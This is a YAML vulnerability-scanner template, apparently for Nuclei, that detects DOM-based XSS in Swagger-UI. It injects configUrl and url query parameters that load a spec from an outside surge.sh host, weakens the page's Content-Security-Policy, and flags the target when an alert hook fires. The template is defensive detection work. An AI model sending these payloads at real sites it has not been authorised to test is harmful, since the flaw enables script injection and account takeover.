id: swagger-ui-dom-xss

info:
  name: Swagger-UI Dom-XSS
  author: sn00py
  severity: medium
  tags: headless,xss,domxss
  reference:
    - https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

headless:
  - attack: batteringram
    payloads:
      query:
        - configUrl=https://jumpy-floor.surge.sh/test.json
        - url=https://jumpy-floor.surge.sh/test.yaml

    steps:
      - action: setheader
        args:
          part: response
          key: Content-Security-Policy
          value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
      - action: script
        args:
          hook: true
          code: |
            window.alert = function (){
              window.isvuln = 'found';
            }
      - args:
          url: "{{BaseURL}}?{{query}}"
        action: navigate
      - action: waitload
      - action: sleep
        args:
          duration: 10
      - action: script
        name: check
        args:
          code: |
            () => {
              return window.isvuln;
            }
    matchers:
      - type: word
        part: check
        words:
          - "found"
